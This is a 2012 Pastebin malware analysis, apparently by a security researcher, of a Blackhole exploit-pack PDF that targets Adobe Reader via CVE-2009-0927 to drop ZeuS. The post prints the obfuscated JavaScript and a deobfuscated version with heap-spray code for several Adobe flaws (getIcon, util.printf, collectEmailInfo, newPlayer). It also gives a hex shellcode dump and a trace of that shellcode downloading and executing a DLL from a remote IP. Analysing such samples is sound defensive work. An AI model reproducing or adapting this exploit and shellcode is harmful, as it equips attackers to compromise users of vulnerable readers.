Advertisement
unixfreaxjp

Malware Anlsys2 PDF/CVE-2009-0927/Adobe getIcon Exploit Pack

Apr 19th, 2012
247
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. This is the PDF Malware to exploit PC with the Adobe getICon exploit/CVE-2009-0927
  2. This one is found in the blackhole exploit pack. to drop ZeuS malware chains.
  3.  
  4. VT Analysis if in here:
  5. https://www.virustotal.com/file/33d0c165072c82b7696cf0b152abdd3e3b2134f5e6ba6fa4fb9da80ad4e1b6fc/analysis/1334855876/
  6.  
  7. details analysis (can't use VT temporarily so I pasted it in here)
  8.  
  9. =============================
  10. I found this sample here:
  11. ==============================
  12. --02:10:13-- hxxp://188.127.249.241/data/ap1.php?f=58
  13. => `ap1.php@f=58'
  14. Connecting to 188.127.249.241:80... connected.
  15. HTTP request sent, awaiting response... 200 OK
  16. Length: 16,488 (16K) [application/pdf]
  17. 100%[====================================>] 16,488 24.62K/s
  18. 02:10:15 (24.60 KB/s) - `ap1.php@f=58' saved [16488/16488]
  19.  
  20. ==============
  21. Structure
  22. ==============
  23. %PDF-1.5
  24. %粤マモ
  25. 7 0 obj
  26. <</Count 1/Type/Pages/Kids「28 0 R]>>
  27. endobj
  28. 10 0 obj
  29. <</Creator(sli)/ModDate(D:20080817171147-07'00')/Company(Windjack Solutions, Inc.)/Title(al)>>
  30. endobj
  31. 21 0 obj
  32. <</Names 23 0 R/Outlines 1 0 R/Metadata 9 0 R/AcroForm 22 0 R/Pages 7 0 R/OCProperties<</D<</RBGroups「]/OFF「]/Order「]>>/OCGs「27 0 R]>>/StructTreeRoot 11 0 R/Type/Catalog>>
  33. endobj
  34. 23 0 obj
  35. <</JavaScript 24 0 R/AP 8 0 R>>
  36. endobj
  37. 24 0 obj
  38. <</Names「78 0 R 76 0 R]>>
  39. endobj
  40. 25 0 obj
  41. <</S/JavaScript/JS 26 0 R>>
  42. endobj
  43. 26 0 obj
  44. <</Length 4/Filter「/FlateDecode]>>stream
  45. endstream
  46. endobj
  47. 28 0 obj
  48. <</CropBox「37 37 575 755]/Annots 29 0 R/Parent 7 0 R/StructParents 0/Contents 60 0 R/Rotate 90/MediaBox「0 0 612 792]/Resources<</XObject<</Im0 69 0 R>>/ColorSpace<</CS0 59 0 R>>/Font<</TT0 61 0 R>>/ProcSet「/PDF/Text/ImageC]/Properties<</MC0 27 0 R>>/ExtGState<</GS0 72 0 R>>>>/Type/Page>>
  49. endobj
  50. 59 0 obj
  51. 「/ICCBased 68 0 R]
  52. endobj
  53. 60 0 obj
  54. <</Length 4/Filter/FlateDecode/Type/Contents>>
  55. stream
  56. endstream
  57. endobj
  58. 76 0 obj
  59. <</S/JavaScript/JS(
  60. function test2\(\){v=ar「z];s=s+cc「v];}
  61. ar=「62,
  62. 61,22,68,19,37,69,67,24,43,75,75,69,67,14,41,66,58,69,67,24,38,14,41,69,67,70,38,66,58,69,67,66,59,43,58,69,67,43,43,38,14,69,67,75,58,41,2,69,67,58,2,24,62,69,67,24,62,43,2,69......
  63. ...and so on...........54,66,13,20,74,17,54,13,60,74,74];
  64. cc={q:"+,0kl:-oz@_C*\)fVAa&={ds.8DxSE]I「KtU2y'5qQci3|v n<>Gw'r\(mW149;jbhpMeug%7N/P}6"}.q;
  65. qq='12e'+'wqva!l';
  66. q=qq「2]+qq「5]+qq「6]+qq「8];
  67. try{loadXML\({}\);}catch\($\){
  68. b={v:{q:this}}.v.q;
  69. w={v:b「q]}.v;
  70. s=Array\(\);
  71. n={v:cc}.v;
  72. for\(i=0;i-3854<0;i++\){
  73. z=i;
  74. test2\(\);
  75. }
  76. w\(s\);
  77. }
  78. )>>
  79. endobj
  80. xref
  81. 0 12
  82. trailer
  83. <</Size 12
  84. /Root 21 0 R>>
  85. xref
  86. 0 0
  87. trailer
  88. <</Size 12/Prev 75626/XRefStm 416/Root 21 0 R>>
  89. startxref
  90. 78995
  91. %%EOF
  92.  
  93. ===============================
  94. JAVASCRIPT DEOBFS
  95. ===============================
  96. bjsg = '
  97. %u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db
  98. %u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175
  99. %uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33
  100. %ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b
  101. %uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433
  102. %u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68
  103. %u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d
  104. %u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224
  105. %u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b
  106. %uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830
  107. %u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83
  108. %u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff
  109. %ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f
  110. %u7468%u7074%u2f3a%u312f%u3838%u312e%u3732%u322e%u3934%u322e%u3134%u772f%u702e%u7068%u663f
  111. %u353d%u2638%u3d65%u0033%u0000';
  112. function ezvr(ra, qy){
  113. while (ra.length * 2 < qy){
  114. ra += ra;
  115. }
  116. ra = ra.substring(0, qy
  117. /2);return ra;} function bx(){var dkg=new Array();var vw=0x0c0c0c0c;var addr=0x400000;var
  118. payload=unescape(bjsg);var sc_len=payload.length*2;var qy=addr-(sc_len+0x38);var yarsp=une
  119. scape('%u9090%u9090');yarsp=ezvr(yarsp,qy);var count2=(vw-0x400000)/addr;
  120. for (var count = 0; count < count2; count ++ ){
  121. dkg「count」 = yarsp + payload;
  122. }
  123. var overflow = unescape('%u0c0c%u0c0c');
  124. while (overflow.length < 44952){
  125. overflow += overflow;
  126. }
  127. this .collabStore = Collab.collectEmailInfo({
  128. subj : '', msg : overflow
  129. }
  130. );
  131. }
  132. function printf(){
  133. nop = unescape('%u0A0A%u0A0A%u0A0A%u0A0A');
  134. var payload = unescape(bjsg);
  135. heapblock = nop + payload;
  136. bigblock = unescape('%u0A0A%u0A0A');
  137. headersize = 20;
  138. spray = headersize + heapblock.length;
  139. while (bigblock.length < spray){
  140. bigblock += bigblock;
  141. }
  142. fillblock = bigblock.substring(0, spray);
  143. block = bigblock.substring(0, bigblock.length - spray);
  144. while (block.length + spray < 0x40000){
  145. block = block + block + fillblock;
  146. }
  147. mem = new Array();
  148. for (i = 0; i < 1400; i ++ ){
  149. mem「i」 = block + heapblock;
  150. }
  151. var num =
  152. 129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888
  153. 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
  154. 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
  155. 88888888888888888888888888;
  156. util.printf('%45000f', num);
  157. }
  158. function geticon(){
  159. var arry = new Array();
  160. if (app.doc.Collab.getIcon){
  161. var payload = unescape(bjsg);
  162. var hWq500CN = payload.length * 2;
  163. var qy = 0x400000 - (hWq500CN + 0x38);
  164. var yarsp = unescape('%u9090%u9090');
  165. yarsp = ezvr(yarsp, qy);
  166. var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
  167. for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
  168. arry「vqcQD96y」 = yarsp + payload;
  169. }
  170. var tUMhNbGw = unescape('%09');
  171. while (tUMhNbGw.length < 0x4000){
  172. tUMhNbGw += tUMhNbGw;
  173. }
  174. tUMhNbGw = 'N.' + tUMhNbGw;
  175. app.doc.Collab.getIcon(tUMhNbGw);
  176. }
  177. }
  178. aPlugins = app.plugIns;
  179. var sv = parseInt(app.viewerVersion.toString().charAt(0));
  180. for (var i = 0; i < aPlugins.length; i ++ ){
  181. if (aPlugins「i」.name == 'EScript'){
  182. var lv = aPlugins「i」.version;
  183. }
  184. }
  185. if ((lv == 9) || ((sv == 8) && (lv <= 8.12))){
  186. geticon();
  187. }
  188. else if (lv == 7.1){
  189. printf();
  190. }
  191. else if (((sv == 6) || (sv == 7)) && (lv < 7.11)){
  192. bx();
  193. }
  194. else if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17)){
  195. function a(){
  196. util.printd('p@111111111111111111111111 : yyyy111', new Date());
  197. }
  198. var h = app.plugIns;
  199. for (var f = 0; f < h.length; f ++ ){
  200. if (h「f」.name == 'EScript'){
  201. var i = h「f」.version;
  202. }
  203. }
  204. if ((i > 8.12) && (i < 8.2)){
  205. c = new Array();
  206. var d = unescape('%u9090%u9090');
  207. var e = unescape(bjsg);
  208. while (d.length <= 0x8000){
  209. d += d;
  210. }
  211. d = d.substr(0, 0x8000 - e.length);
  212. for (f = 0; f < 2900; f ++ ){
  213. c「f」 = d + e;
  214. }
  215. a();
  216. a();
  217. try {
  218. this .media.newPlayer(null);
  219. }
  220. catch (e){
  221. }
  222. a();
  223. }
  224. }
  225.  
  226. ===========================
  227. EXPLOIT CODE
  228. ===========================
  229. It is obviously CVE-2009-0927 (Adobe getIcon flaw)
  230. code:
  231. 4e 2e 09 09 09 09 09 09 09 09 09 09 09 09 09 09
  232. 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
  233. 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
  234. ................................................
  235. .........and so on..............................
  236. 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
  237. 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
  238. 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
  239. 09
  240.  
  241. =============================
  242. Shellcode
  243. =============================
  244. 66 83 e4 fc fc 85 e4 75 34 e9 5f 33 c0 64 8b 40
  245. 30 8b 40 0c 8b 70 1c 56 8b 76 08 33 db 66 8b 5e
  246. 3c 03 74 33 2c 81 ee 15 10 ff ff b8 8b 40 30 c3
  247. 46 39 06 75 fb 87 34 24 85 e4 75 51 e9 eb 4c 51
  248. 56 8b 75 3c 8b 74 35 78 03 f5 56 8b 76 20 03 f5
  249. 33 c9 49 41 fc ad 03 c5 33 db 0f be 10 38 f2 74
  250. 08 c1 cb 0d 03 da 40 eb f1 3b 1f 75 e6 5e 8b 5e
  251. 24 03 dd 66 8b 0c 4b 8d 46 ec ff 54 24 0c 8b d8
  252. 03 dd 8b 04 8b 03 c5 ab 5e 59 c3 eb 53 ad 8b 68
  253. 20 80 7d 0c 33 74 03 96 eb f3 8b 68 08 8b f7 6a
  254. 05 59 e8 98 ff ff ff e2 f9 e8 00 00 00 00 58 50
  255. 6a 40 68 ff 00 00 00 50 83 c0 19 50 55 8b ec 8b
  256. 5e 10 83 c3 05 ff e3 68 6f 6e 00 00 68 75 72 6c
  257. 6d 54 ff 16 83 c4 08 8b e8 e8 61 ff ff ff eb 02
  258. eb 72 81 ec 04 01 00 00 8d 5c 24 0c c7 04 24 72
  259. 65 67 73 c7 44 24 04 76 72 33 32 c7 44 24 08 20
  260. 2d 73 20 53 68 f8 00 00 00 ff 56 0c 8b e8 33 c9
  261. 51 c7 44 1d 00 77 70 62 74 c7 44 1d 05 2e 64 6c
  262. 6c c6 44 1d 09 00 59 8a c1 04 30 88 44 1d 04 41
  263. 51 6a 00 6a 00 53 57 6a 00 ff 56 14 85 c0 75 16
  264. 6a 00 53 ff 56 04 6a 00 83 eb 0c 53 ff 56 04 83
  265. c3 0c eb 02 eb 13 47 80 3f 00 75 fa 47 80 3f 00
  266. 75 c4 6a 00 6a fe ff 56 08 e8 9c fe ff ff 8e 4e
  267. 0e ec 98 fe 8a 0e 89 6f 01 bd 33 ca 8a 5b 1b c6
  268. 46 79 36 1a 2f 70 68 74 74 70 3a 2f 2f 31 38 38
  269. 2e 31 32 37 2e 32 34 39 2e 32 34 31 2f 77 2e 70
  270. 68 70 3f 66 3d 35 38 26 65 3d 33 00 00 00
  271. ===================
  272. Which means
  273. ===================
  274. 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4021be, dwSize=255)
  275. 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
  276. 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248,
  277. [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
  278. 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0,
  279. szURL=hxxp://188.127.249.241/w.php?f=58&e=3,
  280. lpfnCB=0x0,
  281. szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll) 0
  282. 0x7c86250d kernel32.WinExec(
  283. lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  284. 0x7c86250d kernel32.WinExec(
  285. lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  286. 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
  287.  
  288. ====================
  289. While downloaded:
  290. ====================
  291. --02:28:02-- hxxp://188.127.249.241/w.php?f=58
  292. => `w.php@f=58'
  293. Connecting to 188.127.249.241:80... connected.
  294. HTTP request sent, awaiting response... 200 OK
  295. Length: 0 [text/html]
  296. [ <=> ] 0 --.--K/s
  297. 02:28:02 (0.00 B/s) - `w.php@f=58' saved
Advertisement
RAW Paste Data Copied
Advertisement